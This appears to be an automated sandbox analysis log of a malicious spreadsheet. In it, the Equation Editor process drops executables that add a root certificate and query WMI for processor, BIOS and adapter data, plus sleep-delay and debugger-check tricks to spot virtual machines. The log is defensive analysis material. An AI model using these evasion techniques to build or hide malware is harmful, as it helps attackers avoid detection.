Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: PURCHASE ORDER & SAMPLE IMAGE.xlsxStatic file information: File size 1299605 > 1048576
Source: Binary string: wntdll.pdb source: lyebkz.exe, 00000006.00000003.978471354.000000001A930000.00000004.00001000.00020000.00000000.sdmp, lyebkz.exe, 00000006.00000003.979961442.000000001AA90000.00000004.00001000.00020000.00000000.sdmp
Source: PURCHASE ORDER & SAMPLE IMAGE.xlsxInitial sample: OLE indicators vbamacros = False
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeCode function: 6_2_00402959 push ecx; ret 6_2_0040296C
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeCode function: 6_2_00407856 __decode_pointer,LoadLibraryA,GetProcAddress,GetLastError,GetLastError,GetLastError,__encode_pointer,InterlockedExchange,FreeLibrary,6_2_00407856
Source: C:\Users\user\AppData\Roaming\word.exeFile created: C:\Users\user\AppData\Local\Temp\lyebkz.exeJump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\word.exeJump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\maxdyn2.1[1].exeJump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_2-233
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
Contains functionality to detect sleep reduction / modifications
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeCode function: 6_2_004010006_2_00401000
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2028Thread sleep time: -300000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exe TID: 1452Thread sleep time: -1500000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exe TID: 2520Thread sleep time: -10145709240540247s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exe TID: 2520Thread sleep time: -7800000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exe TID: 2520Thread sleep time: -600000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exe TID: 2520Thread sleep time: -100000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exe TID: 2520Thread sleep time: -99953s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exe TID: 2520Thread sleep time: -39362s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exe TID: 2520Thread sleep time: -59706s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exe TID: 2520Thread sleep time: -80094s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exe TID: 2520Thread sleep time: -99985s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exe TID: 2520Thread sleep time: -80111s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exe TID: 2520Thread sleep time: -80235s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exe TID: 2520Thread sleep time: -79752s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exe TID: 2520Thread sleep time: -59628s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exe TID: 2520Thread sleep time: -40345s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exe TID: 2520Thread sleep time: -39535s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exe TID: 2520Thread sleep time: -60423s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_6-11019
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWindow / User API: threadDelayed 9222Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeCode function: 6_2_004010006_2_00401000
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeCode function: 6_2_002407DA GetSystemInfo,6_2_002407DA
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,5_2_00405D74
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0040699E FindFirstFileW,FindClose,5_2_0040699E
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0040290B FindFirstFileW,5_2_0040290B
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeThread delayed: delay time: 100000Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeThread delayed: delay time: 99953Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeThread delayed: delay time: 39362Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeThread delayed: delay time: 59706Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeThread delayed: delay time: 80094Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeThread delayed: delay time: 99985Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeThread delayed: delay time: 80111Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeThread delayed: delay time: 80235Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeThread delayed: delay time: 79752Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeThread delayed: delay time: 59628Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeThread delayed: delay time: 40345Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeThread delayed: delay time: 39535Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeThread delayed: delay time: 60423Jump to behavior
Source: C:\Users\user\AppData\Roaming\word.exeAPI call chain: ExitProcess graph end nodegraph_5-3480
Source: word.exe, 00000005.00000002.987697073.00000000005E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeCode function: 6_2_00402489 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00402489
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeCode function: 6_2_00407856 __decode_pointer,LoadLibraryA,GetProcAddress,GetLastError,GetLastError,GetLastError,__encode_pointer,InterlockedExchange,FreeLibrary,6_2_00407856
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeCode function: 6_2_0040B8DB CreateFileW,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,6_2_0040B8DB
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeProcess token adjusted: DebugJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03674D4B mov edx, dword ptr fs:[00000030h]2_2_03674D4B
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeCode function: 6_2_0024005F mov eax, dword ptr fs:[00000030h]6_2_0024005F
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeCode function: 6_2_0024013E mov eax, dword ptr fs:[00000030h]6_2_0024013E
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeCode function: 6_2_00240109 mov eax, dword ptr fs:[00000030h]6_2_00240109
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeCode function: 6_2_0024017B mov eax, dword ptr fs:[00000030h]6_2_0024017B
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeMemory allocated: page read and write | page guardJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeCode function: 6_2_0040C003 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_0040C003
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeCode function: 6_2_00402489 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00402489
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeCode function: 6_2_00403689 SetUnhandledExceptionFilter,6_2_00403689
